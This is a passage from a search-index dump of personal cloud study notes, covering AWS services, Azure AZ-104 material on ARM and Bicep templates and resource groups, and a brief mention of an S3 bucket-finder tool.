        The goal of an auto scaling group is to scale out. That means add EC2 instances to match an increased load or scale in, that means remove EC2 instances to match a decreased load. With this we can ensure that we have, also as well, a minimum, and a maximum number of machines running at any point of time and once the auto scaling group does create, or remove EC2 instances we can make sure that these instances will be registered, or de registered into our load balancer.

        You can define a minimum size, a maximum size, and a desired capacity.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-migration-tools","title":"Amazon migration tools","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-snow","title":"AWS Snow","text":"
        • Snowball Edge Storage Optimized & Snowball Edge Compute Optimized
        • AWS Snowcone & Snowcone SSD
        • AWS Snowmobile (the truck). 100 PB of capacity.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#edge-computing","title":"Edge Computing","text":"

        Edge Computing is when you process data while it's being created at an edge location. You can use the Snow Family to run EC2 instances and Lambda functions to do this.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-opshub","title":"AWS OpsHub","text":"

        OpsHub which is a software that you install on your computer or laptop, so, it's not something you use on the cloud, it's something that you download on your computer. And then once it's connected, it's going to give you a graphical interface to connect to your Snow devices, and configure them and use them.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-databases","title":"AWS Databases","text":"

        AWS has an offer of managed databases. As benefits, AWS performs quick provisioning, high availability, vertical and horizontal scaling, automated backup, and restore, operations, upgrades, patchings, monitoring, alerting...

        You can always have an EC\" instance and install a database server, but by using AWS managed database you won't need to configure and mantain all the features from previous paragraph.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#relational-database-service-amazon-rds","title":"Relational Database Service (Amazon RDS)","text":"

        It's a relational datababase which uses SQL as a query language.

        • Postgres
        • MySQL
        • MAriaDB
        • Oracle
        • Microsoft SQL Server
        • Aurora (AWS Proprietary Database).

        Note: You can NOT ssh into your instance.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#rds-deployments-read-replicas-multi-az","title":"RDS Deployments: Read Replicas, Multi-AZ","text":"

        RDS Read Replica

        • A Replica is a copy of your database. Creating one is a way to scale the read workload. Say you have an application that performs read operations on your database. If you need to scale the workload, you create Read Replica, which are copies of your RDS Database. This will allows your applications to read also from your Replicas. Therefore \u00a0you're distributing the reads to many different RDS databases.
        • You can create up to Read Replicas.
        • Data is only written to the one only central RDS tatabase.

        Multi-AZ

        • Used for failover in case of AZ outage. In case your RDS crashes, AWS will trigger the replication in a different Availability Zone.

        Multi-Region

        Same as Multi-AZ but for different regions. This is usually part of a disater recovery strategy or a plan to have less latency.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora","title":"Amazon Aurora","text":"
        • Aurora is a proprietary technology from AWS, not open source.
        • Aurora DB supports Postgres and MySQL.
        • Aurora is \"AWS Cloud optimized\" and claims 5x performance improvement over MySQL on RDS, over 3x the performance of Postgres on RDS.
        • Aurora storage aumatically grows in increments of 10 GB, up to 128TB.
        • Aurora costs more than RDS (20%more) but it's more efficient.
        • Not in the free tier

        RDS and Aurora are going to be the two ways for you to create relational databases on AWS. They're both managed and Aurora is going to be more cloud-native, whereas RDS is going to be running the technologies you know, directly as a managed service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-aurora-serverless","title":"Amazon Aurora Serverless","text":"

        Amazon Aurora Serverless is a Serverless option for Amazon Aurora where the database instantiation is going to be automated.

        • Auto-scaling is provided based on actual usage of the database.
        • Postgres and MySQL are supported as engines of Aurora Serverless database.
        • No capacity planning needed.
        • No management needed.
        • Pay per second, most cost-effective.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elasticache","title":"Amazon ElastiCache","text":"
        • Elasticache is to get managed Redis or Memcached.
        • Caches are in-memory databases with high performance, and low latency.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb","title":"DynamoDB","text":"
        • Fully managed highly available with replication across 3 AZ
        • NoSQL database.
        • Scales to massive workloads, distributed serverless database.
        • Millions of requests per seconds: low latency.
        • Integrated with IAM for security, authorization and administration.
        • Low cost and auto-scaling capabilities.
        • Standard and Infrequent Access Table Class.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-accelerator-dax","title":"DynamoDB Accelerator (DAX)","text":"
        • Fully managed in-memory cache for DynamoDB (for the frequently read objects).
        • 10x performance improvement.
        • DAX is only used for and is integrated with DynamoDB, while ElastiCache can be used for other databases.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#dynamodb-global-tables","title":"DynamoDB Global Tables","text":"

        It makes a DynamoDB table accesible with low latency in multiple-regions. It's a feature of DynamoDB.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#redshift","title":"Redshift","text":"
        • It's a database on PostgresSQL, but it's not used for Online Transaction Processing (OLTP).
        • Redshift is Online Analytical Processing (OLAP), used for analytics and data warehousing.
        • Load data onve every hour.
        • Columnar storage of data (instead of row based).
        • Has a SQL interface for performing queries.
        • Massiverly Parallel Query Execution (MPP).
        • Bi tools such as AWS Quicksigh or Tableau integrated in it.

        It has a feature for Serverless: Redshift Serverless.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-mapreduce-emr","title":"Amazon Elastic MapReduce (EMR)","text":"
        • EMR helps creating Hadoop cluster (Big Data) to analyze and process vast amount of data.
        • Also supports Apache Spark, HBase, Presto, Flink.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-athena","title":"Amazon Athena","text":"
        • Amazon Athena is a serverless query service to perform analytics againts S3 objects.
        • It uses SQL language.
        • Supports CVS, JSON, ORC, Avro, and Parquet.
        • Use columnar data.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quicksight","title":"Amazon QuickSight","text":"

        Amazon QuickSight is a serverless machine learning-powered business intelligence service to create interactive dashboards.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#documentdb","title":"DocumentDB","text":"
        • If Aurora is an AWS implementation of Postgres/MySQL, DocumentDB is the same for MongoDB (which is a NoSQL database).
        • MongoDB is used to store, query and index JSON.
        • Fully managed database, with replication across AZ.
        • Automatically scaling.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-neptune","title":"Amazon Neptune","text":"

        Fully managed graph database. A popular graph dataset would be a social network. Highly available acroos 3 AZ, with up to 15 read replicas. Can store up to billios orelations and query the graph with milliseconds of latency.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-quantum-ledger-database-qldb","title":"Amazon Quantum Ledger Database (QLDB)","text":"
        • A ledger is a book recording financial transactions. QLDB is going to be just to have a ledger of financial transactions.
        • It's a fully managed database, it's serverless, highly available, and has replication of data across three AZ.
        • Used to review history of all the changes made to your application data over time.
        • Inmutable system: no entry can be removed or modified, cryptographically verifiable.
        • Difference with Amazon Managed Blockchain: no decentralization component. \u00a0QLDB has a central authority component and it's a ledger, whereas managed blockchain is going to have a de-centralization component as well.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-managed-blockchain","title":"Amazon Managed Blockchain","text":"

        Managed Blockchain by Amazon is a service to join a public Blockchain networks or create your own scalable private Blockchain network within AWS. And it's compatible with two Blockchain so far, the framework Hyperledger Fabric, and the framework Ethereum.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-glue","title":"Amazon Glue","text":"

        Glue is a managed extract, transform, and load service, or ETL. Fully serverless service.

        ETL is very helpful when you have some datasets but they're not exactly in the right form, to do your analytics on them. ETL service prepares and transforms that data.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#glue-data-catalog","title":"Glue Data Catalog","text":"

        is a catalog of your datasets in your Alias infrastructure, and so this Glue Data Catalog will have a alert reference of everything, the column names, the field names, the field types, et cetera, et cetera.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#database-migration-service-dms","title":"Database Migration Service (DMS)","text":"

        DMS provides quick and secure database migration into AWS that's going to be resilient and self healing.

        Supports: Homogeneous migrations and heterogeneous migration.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-compute-services","title":"Amazon Compute Services","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-service-ecs","title":"Elastic Container Service (ECS)","text":"

        It's the way to launch containers in AWS. You must provision and maintain the ingrastructure (EC2 instances). It has integrations with the Application Load Balancer.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#fargate","title":"Fargate","text":"

        It's also used to launch containers in AWS, but you don't need to provision the ingrastructure (no EC2 instances to manage).

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#elastic-container-registry-ecr","title":"Elastic Container Registry (ECR)","text":"

        It's a private docker registry on AWS. The is where you store your docker images.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#lambda","title":"Lambda","text":"
        • It's a serverless compute service that allows you to run functions in the cloud. We have virtual functions, limited by time and they will run on-demand. You pay per request and compute time.
        • Lambda is event-driven: functions get invoked by AWS when needed.
        • It supports many languages.
        • Lambda can be run as a Lambda Container Image.

        Api Gateway feature can expose Lambda functions as HTTP API.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-batch","title":"Amazon Batch","text":"

        Run batch jobs on AWS across EC2 managed instances.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-deployments-and-managing-infrastructure","title":"Amazon: Deployments and managing infrastructure","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloudformation","title":"AWS CloudFormation","text":"
        • Infrastuture as a Service.
        • It creates the architecture and give you the diagram.
        • In CloudFormation you rceate an Stack, select template (that generates a yaml), some other configurations, IAM permissions, costs.
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-development-kit-cdk","title":"Amazon Cloud Development Kit (CDK)","text":"

        It allows you to define your cloud infrastructure using a familiar language. Code is compiled into a CloudFormation template.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-elastic-beanstalk","title":"Amazon Elastic Beanstalk","text":"

        Elastic Beanstalk is a developer centric view of deploying an application on AWS.

        It's PaaS.

        It has a full monitoring suite. Health agent pushes metrics to CloudWatch. Check for app health, publishes health events.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#codedeploy","title":"CodeDeploy","text":"

        CodeDeploy deploys your application automatically.

        Hybrid service because it works with ECT and On-premise severs.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codecommit","title":"AWS CodeCommit","text":"

        It's AWS version control code repository.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codebuild","title":"AWS CodeBuild","text":"

        It's a Code building service in the cloud. It compiles source code, run test, and produces packages that are ready to be deployed.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codepipeline","title":"AWS CodePipeline","text":"

        CodePipeline orchestrate the different steps to have the code automatically pushed to production. Basis for CICD (Continuous Integration and Continuous Delivery).

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codeartefact","title":"AWS CodeArtefact","text":"

        It's a service used to store and retrieve all software packages dependencies to be built. It works with common dependency management tools such as maven, gradle, npm, twine, pip, nuGet. It's an artefact management system.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-codestar","title":"AWS CodeStar","text":"

        Unified UI to easily manage software development activities in one place. It can edit the code in the cloud directly using AWS Cloud9.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-cloud9","title":"AWS Cloud9","text":"

        AWS Cloud9 is a cloud IDE for writing, running and debugging code directly in the cloud.

        Code collaboration in real time.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-global-applications","title":"Amazon Global Applications","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-route-53","title":"Amazon Route 53","text":"

        Managed DNS by AWS. It has A, AAA, or CNAME record.

        • Simple routing policy (no health checks).
        • Weighted routing policy (with percentages).
        • Latency routing policies (based on lacency between users and servers).
        • Failover routing policy (for disaster recovery).
        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloudfront","title":"Amazon CloudFront","text":"

        It's the Content Delivery Network. So far it has 216 points of presence. It has DDoS protection. Improve read performance, since content is cached at the edge.

        Origins: S3 (protected with OAC Origin Access Control, that replaces OAI Origin Access Identity), Custom Origin HTTP.

        Files are cached for a TTL.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#s3-transfer-acceleration","title":"S3 Transfer Acceleration","text":"

        Increase transfer speed among S3 across regions by using the AWS global network.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-global-accelerator","title":"AWS Global Accelerator","text":"

        Improve global application availability and performance using the AWS global network.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-outpost","title":"AWS Outpost","text":"

        AWS Outposts are \"server racks that offer the same AWS infrastructure, service, APIs & tools to build your own applications on-premises just as in the cloud. This allows you to extent your on-premises services to AWS.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#aws-wavelength","title":"AWS WaveLength","text":"

        AWS WaveLength Zones are infrastructure deployments embedded within the telecommunications providers's datacenters at the edge of 5G networks. It brings AZS services to the edge of the 5G networks. Traffic never leaves the Communication Service Provider (CSP) networks.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-integrations","title":"Amazon Cloud integrations","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sqs","title":"Amazon SQS","text":"

        It's a simple Queue Service. Two types:

        • Standard Queue is the oldest AWS offering. It's fully managed service.
        • FIFO queues.

        It allows us to decouple

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-kinesis","title":"Amazon Kinesis","text":"

        It's a real time big data streaming.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-sns","title":"Amazon SNS","text":"

        Amazon SNS stands for Simple Notification Service. It creates a set of notifications about certain events. Event publishers only sends one message to one SNS topic. Each subscriber to the topic will get all the messages. It's a pub/sub service.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-mq","title":"Amazon MQ","text":"

        Amazon MQ is a managed message broker service for two technologies, for RabbitMQ and for ActiveMQ.

        SQS and SNS are cloud-native services because they are proprietary protocols from AWS. They use their own sets of APIs.

        If you are running traditional application on-premises, you may use open protocols such as MQTT, AMQP, STOMP, Openwire, WSS. And when you're migrating your application to the cloud, you may not want to re-engineer your application to use the SQS and the SNS protocols or APIs. So instead, you wanna use the traditional protocols you used to, such as MQTT, AMQP, and so on. And for this, we can use Amazon MQ.

        ","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/aws-essentials/#amazon-cloud-monitoring","title":"Amazon Cloud Monitoring","text":"","tags":["cloud","aws","amazon web services","public cloud"]},{"location":"cloud/aws/pentesting-aws/","title":"Pentesting Amazon Web Services (AWS)","text":"","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#amazon-s3","title":"Amazon S3","text":"

        S3 is an object storage service in the AWS cloud service. With S3, you can store objects in buckets. Files stored in an Amazon S3 bucket are called S3 objects.

        aws-cli is a tool that lists the S3 objects.

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/aws/pentesting-aws/#enumerate-instances","title":"Enumerate instances","text":"

        insp3ctor: the AWS bucket finder.

        ","tags":["cloud","Azure","pentesting cloud"]},{"location":"cloud/azure/az-104-preparation/","title":"AZ-104 Microsoft Azure Administrator certificate","text":"

        Sources of this notes

        • The Microsoft e-learn platform.
        • Udemy course: Prove your AZ-104 Microsoft Azure Administrator skills to the world. Updated..
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#configure-azure-resources-with-tools","title":"Configure Azure resources with tools","text":"

        There's approximate parity between the portal, the Azure CLI, and Azure PowerShell with respect to the Azure objects they can administer and the configurations they can create. They're also all cross-platform. Typically, you'll consider several factors when making your choice:

        • Automation: Do you need to automate a set of complex or repetitive tasks? Azure PowerShell and the Azure CLI support automation, but Azure portal doesn't.
        • Learning curve: Do you need to complete a task quickly without learning new commands or syntax? The Azure portal doesn't require you to learn syntax or memorize commands. In Azure PowerShell and the Azure CLI, you must know the detailed syntax for each command you use.
        • Team skillset: Does your team have existing expertise? For example, your team might have used PowerShell to administer Windows. If so, they'll quickly become comfortable using Azure PowerShell.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cloud-shell","title":"Azure Cloud Shell","text":"
        • Is temporary and requires a new or existing Azure Files share to be mounted.
        • Offers an integrated graphical text editor based on the open-source Monaco Editor.
        • Authenticates automatically for instant access to your resources.
        • Runs on a temporary host provided on a per-session, per-user basis.
        • Times out after 20 minutes without interactive activity.
        • Requires a resource group, storage account, and Azure File share.
        • Uses the same Azure file share for both Bash and PowerShell.
        • Is assigned to one machine per user account.
        • Persists $HOME using a 5-GB image held in your file share.
        • Permissions are set as a regular Linux user in Bash.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-powershell","title":"Azure PowerShell","text":"

        Azure PowerShell is a module that you add to Windows PowerShell or PowerShell Core to enable you to connect to your Azure subscription and manage resources. Azure PowerShell requires PowerShell to function. PowerShell provides services such as the shell window and command parsing. Azure PowerShell adds the Azure-specific commands.

        See cheat sheet for Azure Powershell.

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-cli","title":"Azure CLI","text":"

        Azure CLI is a command-line program to connect to Azure and execute administrative commands on Azure resources. The Azure CLI is available two ways: inside a browser via the Azure Cloud Shell, or with a local installation on Linux, Mac, or Windows. It allows administrators and developers to execute their commands through a terminal, command-line prompt, or script instead of a web browser.

        See cheat sheet for Azure CLI.

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-arm","title":"Azure Resource Manager (ARM)","text":"

        Azure Resource Manager provides several benefits:

        • You can deploy, manage, and monitor all the resources for your solution as a group, rather than handling these resources individually.
        • You can repeatedly deploy your solution throughout the development lifecycle and have confidence your resources are deployed in a consistent state.
        • You can manage your infrastructure through declarative templates rather than scripts.
        • You can define the dependencies between resources so they're deployed in the correct order.
        • You can apply access control to all services in your resource group because Role-Based Access Control (RBAC) is natively integrated into the management platform.
        • You can apply tags to resources to logically organize all the resources in your subscription.
        • You can clarify your organization's billing by viewing costs for a group of resources sharing the same tag.

        Two concepts that I need to review for this:

        • resource provider\u00a0- A service that supplies the resources you can deploy and manage through Resource Manager. Each resource provider offers operations for working with the resources that are deployed. Some common resource providers are Microsoft.Compute, which supplies the virtual machine resource, Microsoft.Storage, which supplies the storage account resource, and Microsoft.Web, which supplies resources related to web apps. The Microsoft.KeyVault resource provider offers a resource type called vaults for creating the key vault, useful if you want to store keys and secrets. The name of a resource type is in the format: {resource-provider}/{resource-type}. For example, the key vault type is Microsoft.KeyVault/vaults.
        • declarative syntax\u00a0- Syntax that lets you state \"Here is what I intend to create\" without having to write the sequence of programming commands to create it. The Resource Manager template is an example of declarative syntax. In the file, you define the properties for the infrastructure to deploy to Azure.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#resource-groups","title":"Resource groups","text":"

        Creating resource groups:

        • All the resources in your group should share the same lifecycle. You deploy, update, and delete them together. If one resource, such as a database server, needs to exist on a different deployment cycle it should be in another resource group.
        • Each resource can only exist in one resource group.
        • You can add or remove a resource to a resource group at any time.
        • You can move a resource from one resource group to another group. Limitations do apply to\u00a0moving resources.
        • A resource group can contain resources that reside in different regions.
        • A resource group can be used to scope access control for administrative actions.
        • A resource can interact with resources in other resource groups. This interaction is common when the two resources are related but don't share the same lifecycle (for example, web apps connecting to a database).

        When creating a resource group, you need to provide a location for that resource group. You may be wondering, \"Why does a resource group need a location? And, if the resources can have different locations than the resource group, why does the resource group location matter at all?\" The resource group stores metadata about the resources. Therefore, when you specify a location for the resource group, you're specifying where that metadata is stored. For compliance reasons, you may need to ensure that your data is stored in a particular region.

        Moving resources:

        When moving resources, both the source group and the target group are locked during the operation. Write and delete operations are blocked on the resource groups until the move completes. This lock means you can't add, update, or delete resources in the resource groups. Locks don't mean the resources aren't available. For example, if you move a virtual machine to a new resource group, an application can still access the virtual machine.

        Move operation support for resources: This page details what resources can be moved between resources group, subscriptions, and regions.

        To move resources, select the resource group containing those resources, and then select the\u00a0Move\u00a0button. Select the resources to move and the destination resource group. Acknowledge that you need to update scripts.

        Deleting resources:

        See how to remove a resource group using Azure powershell.

        Determine resource limits:

        • The limits shown are the limits for your subscription.
        • When you need to increase a default limit, there is a Request Increase link.
        • All resources have a maximum limit listed in Azure\u00a0limits.
        • If you are at the maximum limit, the limit can't be increased.
        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-locks","title":"Azure Resource Manager Locks","text":"

        Creating Azure Resource Manager Locks:

        Resource Manager locks allow organizations to put a structure in place that prevents the accidental deletion of resources in Azure.

        • You can associate the lock with a subscription, resource group, or resource.
        • Locks are inherited by child resources.

        Only the Owner and User Access Administrator roles can create or delete management locks.

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#azure-resource-manager-template","title":"Azure Resource Manager template","text":"

        An\u00a0Azure Resource Manager template\u00a0precisely defines all the Resource Manager resources in a deployment. These are some benefits:

        • Templates improve consistency. Resource Manager templates provide a common language for you and others to describe your deployments. Regardless of the tool or SDK that you use to deploy the template, the structure, format, and expressions inside the template remain the same.
        • Templates help express complex deployments. Templates enable you to deploy multiple resources in the correct order. For example, you wouldn't want to deploy a virtual machine prior to creating an operating system (OS) disk or network interface. Resource Manager maps out each resource and its dependent resources, and creates dependent resources first. Dependency mapping helps ensure that the deployment is carried out in the correct order.
        • Templates reduce manual, error-prone tasks. Manually creating and connecting resources can be time consuming, and it's easy to make mistakes. Resource Manager ensures that the deployment happens the same way every time.
        • Templates are code. Templates express your requirements through code. Think of a template as a type of Infrastructure as Code that can be shared, tested, and versioned similar to any other piece of software. Also, because templates are code, you can create a \"paper trail\" that you can follow. The template code documents the deployment. Most users maintain their templates under some kind of revision control, such as GIT. When you change the template, its revision history also documents how the template (and your deployment) has evolved over time.
        • Templates promote reuse. Your template can contain parameters that are filled in when the template runs. A parameter can define a username or password, a domain name, and so on. Template parameters enable you to create multiple versions of your infrastructure, such as staging and production, while still using the exact same template.
        • Templates are linkable. You can link Resource Manager templates together to make the templates themselves modular. You can write small templates that each define a piece of a solution, and then combine them to create a complete system.
        • Templates simplify orchestration. You only need to deploy the template to deploy all of your resources. Normally this would take multiple operations.

        The template uses a\u00a0declarative syntax. The declarative syntax is a way of building the structure and elements that outline what resources will look like without describing the control flow. Declarative syntax is different than imperative syntax, which uses commands for the computer to perform. Imperative scripting focuses on specifying each step in deploying the resources.

        ARM templates are idempotent, which means you can deploy the same template many times and get the same resource types in the same state.

        Resource Manager orchestrates deploying the resources so they're created in the correct order. When possible, resources will also be created in parallel, so ARM template deployments finish faster than scripted deployments.

        Resource Manager also has built-in validation. It checks the template before starting the deployment to make sure the deployment will succeed.

        You can also integrate your ARM templates into continuous integration and continuous deployment (CI/CD) tools like Azure Pipelines.

        The schema:

        {\n    \"$schema\": \"http://schema.management.\u200bazure.com/schemas/2019-04-01/deploymentTemplate.json#\",\u200b\n    \"contentVersion\": \"\",\u200b\n    \"parameters\": {},\u200b\n    \"variables\": {},\u200b\n    \"functions\": [],\u200b\n    \"resources\": [],\u200b\n    \"outputs\": {}\u200b\n}\n
        Element name Required Description $schema Yes Location of the JSON schema file that describes the version of the template language. Use the URL shown in the preceding example. contentVersion Yes Version of the template (such as 1.0.0.0). You can provide any value for this element. Use this value to document significant changes in your template. This value can be used to make sure that the right template is being used. parameters No Values that are provided when deployment is executed to customize resource deployment. variables No Values that are used as JSON fragments in the template to simplify template language expressions. functions No User-defined functions that are available within the template. resources Yes Resource types that are deployed or updated in a resource group. outputs No Values that are returned after deployment.

        Let's start with parameters:

        \"parameters\": {\n    \"<parameter-name>\" : {\n        \"type\" : \"<type-of-parameter-value>\",\n        \"defaultValue\": \"<default-value-of-parameter>\",\n        \"allowedValues\": [ \"<array-of-allowed-values>\" ],\n        \"minValue\": <minimum-value-for-int>,\n        \"maxValue\": <maximum-value-for-int>,\n        \"minLength\": <minimum-length-for-string-or-array>,\n        \"maxLength\": <maximum-length-for-string-or-array-parameters>,\n        \"metadata\": {\n        \"description\": \"<description-of-the parameter>\"\n        }\n    }\n}\n

        This would be an example:

        \"parameters\": {\n  \"adminUsername\": {\n    \"type\": \"string\",\n    \"metadata\": {\n      \"description\": \"Username for the Virtual Machine.\"\n    }\n  },\n  \"adminPassword\": {\n    \"type\": \"securestring\",\n    \"metadata\": {\n      \"description\": \"Password for the Virtual Machine.\"\n    }\n  }\n}\n

        You're limited to 256 parameters in a template. You can reduce the number of parameters by using objects that contain multiple properties.

        Azure Quickstart Templates\u00a0are Azure Resource Manager templates provided by the Azure community. Some templates provide everything you need to deploy your solution, while others might serve as a starting point for your template.

        • The README.md file provides an overview of what the template does.
        • The azuredeploy.json file defines the resources that will be deployed.
        • The azuredeploy.parameters.json file provides the values the template needs.

        It caught my eye: https://github.com/azure/azure-quickstart-templates/tree/master/application-workloads/blockchain/blockchain

        You can deploy an ARM template to Azure in one of the following ways: - Deploy a local template - Deploy a linked template - Deploy in a continuous deployment pipeline

        Example: To add a resource to your template, you'll need to know the resource provider and its types of resources. The syntax for this combination is in the form of {resource-provider}/{resource-type}.

        See the code:

        {\n  \"$schema\": \"https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#\",\n  \"contentVersion\": \"1.0.0.1\",\n  \"apiProfile\": \"\",\n  \"parameters\": {},\n  \"variables\": {},\n  \"functions\": [],\n  \"resources\": [\n    {\n      \"type\": \"Microsoft.Storage/storageAccounts\",\n      \"apiVersion\": \"2019-06-01\",\n      \"name\": \"learntemplatestorage123\",\n      \"location\": \"westus\",\n      \"sku\": {\n        \"name\": \"Standard_LRS\"\n      },\n      \"kind\": \"StorageV2\",\n      \"properties\": {\n        \"supportsHttpsTrafficOnly\": true\n      }\n    }\n  ],\n  \"outputs\": {}\n}\n

        **To create a ARM template use Visual Studio Code with the extension \"Azure Resource Manager (ARM) Tools for Visual Studio Code\". **

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-104-preparation/#biceps-templates","title":"Biceps templates","text":"

        Bicep is a domain-specific language (DSL) that uses declarative syntax to deploy Azure resources. In a Bicep file, you define the infrastructure you want to deploy to Azure, and then use that file throughout the development lifecycle to repeatedly deploy your infrastructure. Your resources are deployed in a consistent manner. Bicep provides concise syntax, reliable type safety, and support for code reuse. Bicep offers a first-class authoring experience for your\u00a0infrastructure-as-code\u00a0solutions in Azure.

        How does Bicep work?

        When you deploy a resource or series of resources to Azure, the tooling that's built into Bicep converts your Bicep template into a JSON template. This process is known as transpilation. Transpilation is the process of converting source code written in one language into another language.

        Bicep provides many improvements over JSON for template authoring, including:

        • Simpler syntax: Bicep provides a simpler syntax for writing templates. You can reference parameters and variables directly, without using complicated functions. String interpolation is used in place of concatenation to combine values for names and other items. You can reference the properties of a resource directly by using its symbolic name instead of complex reference statements. These syntax improvements help both with authoring and reading Bicep templates.

        • Modules: You can break down complex template deployments into smaller module files and reference them in a main template. These modules provide easier management and greater reusability.

        • Automatic dependency management: In most situations, Bicep automatically detects dependencies between your resources. This process removes some of the work involved in template authoring.

        • Type validation and IntelliSense: The Bicep extension for Visual Studio Code features rich validation and IntelliSense for all Azure resource type API definitions. This feature helps provide an easier authoring experience.

        ","tags":["cloud","azure","az-104","course","certification"]},{"location":"cloud/azure/az-500-ad-1-identity-and-access/","title":"I. Manage Identity and Access","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
